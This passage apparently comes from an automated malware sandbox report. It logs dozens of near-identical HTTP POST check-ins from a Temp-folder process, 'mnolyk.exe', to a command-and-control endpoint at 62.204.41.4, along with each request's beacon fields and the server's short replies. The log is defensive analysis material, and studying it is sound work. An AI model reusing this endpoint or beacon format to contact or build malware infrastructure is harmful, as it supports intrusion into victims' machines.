                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:33.838745117 CET647INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            459192.168.2.45015462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:34.013056993 CET648OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:34.077205896 CET648INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            46192.168.2.44974162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:38.059834957 CET235OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:38.128957033 CET235INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            460192.168.2.45015562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:34.245100021 CET649OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:34.308211088 CET649INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            461192.168.2.45015662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:34.495754004 CET650OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:34.559389114 CET650INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            462192.168.2.45015762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:34.733705997 CET651OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:34.797499895 CET651INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            463192.168.2.45015862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:34.968887091 CET652OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:35.034178972 CET652INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:34 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            464192.168.2.45015962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:35.215446949 CET653OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:35.279859066 CET653INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            465192.168.2.45016062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:35.471399069 CET654OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:35.535490036 CET654INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            466192.168.2.45016162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:35.717279911 CET655OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:35.779613018 CET655INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            467192.168.2.45016262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:35.950587034 CET656OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:36.017430067 CET656INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:35 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            468192.168.2.45016362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:36.189852953 CET657OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:36.258935928 CET657INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            469192.168.2.45016462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:36.434453011 CET658OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:36.497564077 CET658INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            47192.168.2.44974262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:37:38.312283039 CET236OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:38.375379086 CET236INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            470192.168.2.45016562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:36.727771997 CET659OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:36.791326046 CET659INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            471192.168.2.45016662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:36.964835882 CET660OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:37.028923035 CET660INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:36 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            472192.168.2.45016762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:37.216090918 CET661OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:37.280250072 CET661INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            473192.168.2.45016862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:37.476154089 CET662OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:37.541282892 CET662INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            474192.168.2.45016962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:37.723515034 CET663OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:37.787247896 CET663INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            475192.168.2.45017062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:37.964961052 CET664OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.027384996 CET664INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:37 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            476192.168.2.45017162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:38.199717999 CET665OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:39:38.264652014 CET665INHTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:39:38 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            477192.168.2.45017262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            TimestampkBytes transferredDirectionData
                            Feb 8, 2023 17:39:38.433748960 CET665OUTPOST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
